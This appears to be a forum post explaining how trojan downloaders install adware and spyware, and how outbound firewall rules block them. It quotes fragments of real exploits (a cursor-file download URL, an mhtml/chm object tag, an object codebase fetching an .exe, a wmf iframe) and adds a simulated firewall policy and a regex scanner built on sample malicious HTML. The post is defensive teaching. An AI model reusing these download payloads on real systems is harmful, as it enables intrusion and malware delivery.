Ask people how adware and spyware get installed, and many may not know about trojan droppers and downloaders, or understand how they work.
An acquaintance took her computer to a shop to have Spy Sheriff removed. She found it hard to accept that it was a downloader, and not Windows, that was displaying the "you are infected" notice.
Most malware today is created to make money. This is achieved by surreptitiously installing spyware, adware, keyloggers, etc, and is often accomplished by means of a trojan "downloader." This file, once successfully installed, connects out to the internet to download malware of all types, and often, more downloaders to continue the cycle.
Sunbelt currently lists 405 Trojan Downloader threats.
If installed, trojans can still be blocked from carrying out their payload by a firewall with outbound protection,
• which alerts on any application attempting to connect out that has not previously been authorized to do so; or,
• which blocks an application by a specific rule.
Some examples follow.
Infection via email attachment: gift.com

When executed, gift.com copies itself to %windir% as winrpc.exe and attempts to connect out:
[screenshot]
If it connects out, it downloads drsmartload.exe, the workhorse downloader of this exploit. This trojan has been seen in a number of exploits:
[screenshots]
If it connects out successfully, a few "gifts" will be received:
[screenshot]
Infection via email attachment: W32.Sober.Q

If the user executes the email attachment, the worm copies itself as Services.exe and first attempts to connect out to a time server on port 37 (the RFC 868 Time protocol). There is a legitimate services.exe in Win2K/XP, but the firewall compares the application's MD5 with the one it has on record for the authorized program, sees a mismatch, and alerts:
[screenshots]
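The outbound-protection behaviour this page relies on (prompt on an application that was never authorized, deny by a specific rule, and the MD5 check that catches a worm posing as Services.exe) can be written down as a small policy engine. What follows is an added example, not code from the original post or from any particular firewall product; the paths, the stand-in executable bytes, the recorded hashes and the connection attempts are all constructed for illustration. It covers the gift.com and Sober.Q cases above and adds an explicit block rule for explorer.exe on port 80.

```python
"""Application-aware outbound filtering, simulated.

Added example, not from the original post: the paths, image bytes,
hashes and connection attempts below are all constructed for illustration.
"""
import hashlib
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Attempt:
    """One outbound connection request as the firewall driver sees it."""
    exe_path: str      # image path of the process asking to connect out
    exe_image: bytes   # on-disk image bytes; the firewall hashes these
    remote_host: str
    remote_port: int


@dataclass
class Policy:
    # Authorized programs: normalized path -> MD5 hex digest recorded at the
    # moment the user approved that program (the "remember this answer" click).
    authorized: dict
    # Explicit block rules: (normalized path, remote port) -> always denied.
    block_rules: set = field(default_factory=set)


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def norm(path: str) -> str:
    """Windows paths are case-insensitive; compare them in one canonical form."""
    return path.replace("/", "\\").lower()


def decide(policy: Policy, attempt: Attempt) -> tuple:
    """Return (verdict, reason); verdict is 'allow', 'block' or 'alert'.

    'alert' is the prompt-the-user path: the application is either unknown or
    its image no longer matches the one that was authorized.
    """
    path = norm(attempt.exe_path)
    if (path, attempt.remote_port) in policy.block_rules:
        return ("block", "matched an explicit block rule")
    expected = policy.authorized.get(path)
    if expected is None:
        return ("alert", "application has not previously been authorized to connect out")
    if md5_hex(attempt.exe_image) != expected:
        return ("alert", "application hash does not match the authorized image")
    return ("allow", "authorized application, hash verified")


# Constructed stand-ins for executable images (real ones would be PE files).
LEGIT_SERVICES = b"MZ\x90\x00 constructed stand-in for the genuine services.exe"
LEGIT_EXPLORER = b"MZ\x90\x00 constructed stand-in for the genuine explorer.exe"
WORM_SERVICES = b"MZ\x90\x00 constructed stand-in for the W32.Sober.Q copy"
WINRPC = b"MZ\x90\x00 constructed stand-in for winrpc.exe dropped by gift.com"


def build_policy() -> Policy:
    """Assumed rule set: two system binaries were approved with their hashes
    recorded, and Explorer is additionally barred from plain HTTP."""
    return Policy(
        authorized={
            norm(r"C:\WINDOWS\system32\services.exe"): md5_hex(LEGIT_SERVICES),
            norm(r"C:\WINDOWS\explorer.exe"): md5_hex(LEGIT_EXPLORER),
        },
        block_rules={(norm(r"C:\WINDOWS\explorer.exe"), 80)},
    )


# Constructed connection attempts mirroring the cases on this page.
SAMPLE_ATTEMPTS = [
    # gift.com's dropped copy: never authorized -> prompt
    Attempt(r"C:\WINDOWS\winrpc.exe", WINRPC, "203.0.113.10", 80),
    # the real services.exe doing its normal work -> allowed
    Attempt(r"C:\WINDOWS\system32\services.exe", LEGIT_SERVICES, "192.0.2.5", 445),
    # Sober.Q copy overwriting the authorized path: same name, wrong hash -> prompt
    Attempt(r"C:\WINDOWS\system32\services.exe", WORM_SERVICES, "192.0.2.37", 37),
    # Sober.Q copy under a different path: just an unknown program -> prompt
    Attempt(r"C:\WINDOWS\Services.exe", WORM_SERVICES, "192.0.2.37", 37),
    # explorer.exe (hash intact) used for an HTTP download, as the codec trojan does -> rule
    Attempt(r"C:\WINDOWS\explorer.exe", LEGIT_EXPLORER, "198.51.100.7", 80),
]


def run_samples() -> list:
    policy = build_policy()
    return [(a.exe_path, a.remote_port, decide(policy, a)[0]) for a in SAMPLE_ATTEMPTS]


if __name__ == "__main__":
    for path, port, verdict in run_samples():
        print(f"{verdict:5s}  {path} -> tcp/{port}")
```

The hash comparison is what separates this from a plain per-path allowlist: a worm that overwrites an approved binary still triggers a prompt, while one that lands under a new name is simply an unknown program. The check is made on the on-disk image at the time of the request, so it says nothing about code that has been injected into, or is merely driving, an already-approved process; that is the case the codec example below illustrates, and it is why an explicit per-application rule is still worth having.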
Trojan piggy-backed on a program: Codec

Links on web sites offer a codec. When the codec.exe is downloaded and installed, it also connects out through Windows Explorer (explorer.exe) to download and install malware:
[screenshot]
Attempt to disable Firewall: Bagle

Quote from a post on another forum:
I did a booboo by starting to open a file called 06_05_2005.exe,
when I realized it I stopped. But it has taken my firewall away,...
The poster didn't say if he had password protection enabled, which will block an attempt to disable the firewall service, as many Bagle variants try to do.
Note the spoofed notepad icon:
[screenshot]
Remote Code Execution: Animated Cursor Exploit

An animated cursor file is cached, and downloads win32.exe, which connects out to the internet. The API names and URL embedded in the cursor file show how the download is done:
GetProcAddress-LoadLibrary-GetSystemDirectory-
urlmon.dll-URLDownloadToFile-WinExec-
HTTP://195.225.177.33/vx/win32.exe
[screenshot]
Remote Code Execution: mhtml exploit

Using a fake .chm file, Trojan.Downloader.Small, to download the trojan load.exe. A classic case of one of the "loader" downloaders calling out for more downloaders:
<SCRIPT LANGUAGE="JavaScript">
obj = "<object data=\"ms-its:mhtml:file";
hxxp: / / traffweb.biz/dl/adv799/x.chm::/load.exe
[screenshots]
Remote Code Execution: Browser Helper Object Exploit

An IE plugin connects to a web site, exfol.com. The site remotely downloads a trojan, eins008.exe, Trojan-Downloader-Exfol:
<object id="sClass" classid="CLSID:444B911E-6E55-4a11-B3E9-0D3E21AE0437" codebase="http://www.exfol.com/v/1/i/eins008.exe"></object>
[screenshot]
Remote Code Execution: wmf exploit

The wmf file downloads ioo.exe, detected by Trend Micro as TROJ_DLOADER.BFK, which further exposes the affected system to other malicious threats. It then saves the malware it downloads as voi{Random number}.EXE, one instance being voi548.exe, Trojan.Downloader.Win32.Agent. In order to see ioo.exe, I took a screen shot of it being blocked; otherwise it downloads so quickly in the background that you miss it:
<iframe src="wmf_exp.wmf"></iframe>
[screenshots]
If successful, this trojan begins the installation of Spy Sheriff:
[screenshots]
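The three browser-side vectors above (the ms-its:mhtml: object data, an object codebase pointing at an .exe, and an iframe loading a .wmf) leave static markers in the page source that a proxy or mail gateway can flag before the browser ever renders them. The scanner below is an added example, not code from the original post; the regular expressions are my own approximations of the fragments shown above, and the sample pages are constructed, with hostnames on the reserved .example domain standing in for the real ones.

```python
"""Static markers for the three browser-side downloader vectors shown above.

Added example, not from the original post. The regular expressions are my
own approximations of those fragments, and the sample pages are constructed
(hostnames use the reserved .example TLD).
"""
import re

# Each indicator: (short name, pattern). Patterns are case-insensitive because
# IE of that era accepted any casing of tag names and protocol handlers.
INDICATORS = [
    # <object data="ms-its:mhtml:..."> : the ms-its/mhtml handler chain that
    # lets a .chm deliver an executable. The \\? allows for the escaped quote
    # seen when the tag is assembled inside a JavaScript string.
    ("ms-its-object",
     re.compile(r'<object[^>]*\bdata\s*=\s*\\?["\']?\s*ms-its:', re.I)),
    # mhtml:...x.chm::/load.exe : an executable addressed inside a .chm
    ("chm-exe",
     re.compile(r'mhtml:[^"\'\s>]*\.chm::/[^"\'\s>]*\.exe', re.I)),
    # <object codebase="http://.../eins008.exe"> : codebase fetching an .exe
    ("codebase-exe",
     re.compile(r'<object[^>]*\bcodebase\s*=\s*["\']?https?://[^"\'\s>]+\.exe\b', re.I)),
    # <iframe src="wmf_exp.wmf"> : a Windows Metafile pulled in by an iframe
    ("wmf-iframe",
     re.compile(r'<iframe[^>]*\bsrc\s*=\s*["\']?[^"\'\s>]+\.wmf(?=["\'\s>?#]|$)', re.I)),
]


def scan_html(html: str) -> list:
    """Return the names of every indicator that fires on this page body."""
    return [name for name, rx in INDICATORS if rx.search(html)]


# Constructed sample pages, one per vector plus a benign control.
SAMPLES = {
    "mhtml_chm": r'''<SCRIPT LANGUAGE="JavaScript">
obj = "<object data=\"ms-its:mhtml:file://C:\\nosuch.mht!http://dl.malware.example/adv/x.chm::/load.exe\">";
document.write(obj);
</SCRIPT>''',
    "bho_codebase": '''<object id="sClass" classid="CLSID:444B911E-6E55-4a11-B3E9-0D3E21AE0437"
 codebase="http://www.malware.example/v/1/i/eins008.exe"></object>''',
    "wmf_iframe": '<iframe src="wmf_exp.wmf" width="1" height="1"></iframe>',
    "benign": '''<object data="movie.swf" type="application/x-shockwave-flash"></object>
<iframe src="https://www.example.com/page.html"></iframe>''',
}


def scan_samples() -> dict:
    """Run every indicator over every sample; label -> list of hits."""
    return {label: scan_html(html) for label, html in SAMPLES.items()}


if __name__ == "__main__":
    for label, hits in scan_samples().items():
        print(f"{label:13s} {hits or 'clean'}")
```

Patterns like these are cheap and catch the mass-produced kits the page describes, but they are easily evaded by splitting strings or encoding the tag inside script, so they belong in front of a patched browser, not in place of one.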
All of the above exploits have been patched, yet they continue to appear, especially in multiple-exploit malware embedded in websites, and, unfortunately, continue to infect unaware users.
Many may feel they are already well protected against malware installing or executing.
However, if one is concerned about an unexpected, unforeseen (dare I say "zero-day") occurrence, a firewall with outbound protection, or one of the newer products with application-outbound protection, will help contain the damage locally and will also prevent SMTP email engines from sending to harvested email addresses to infect others.
______________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."--Bruce Schneier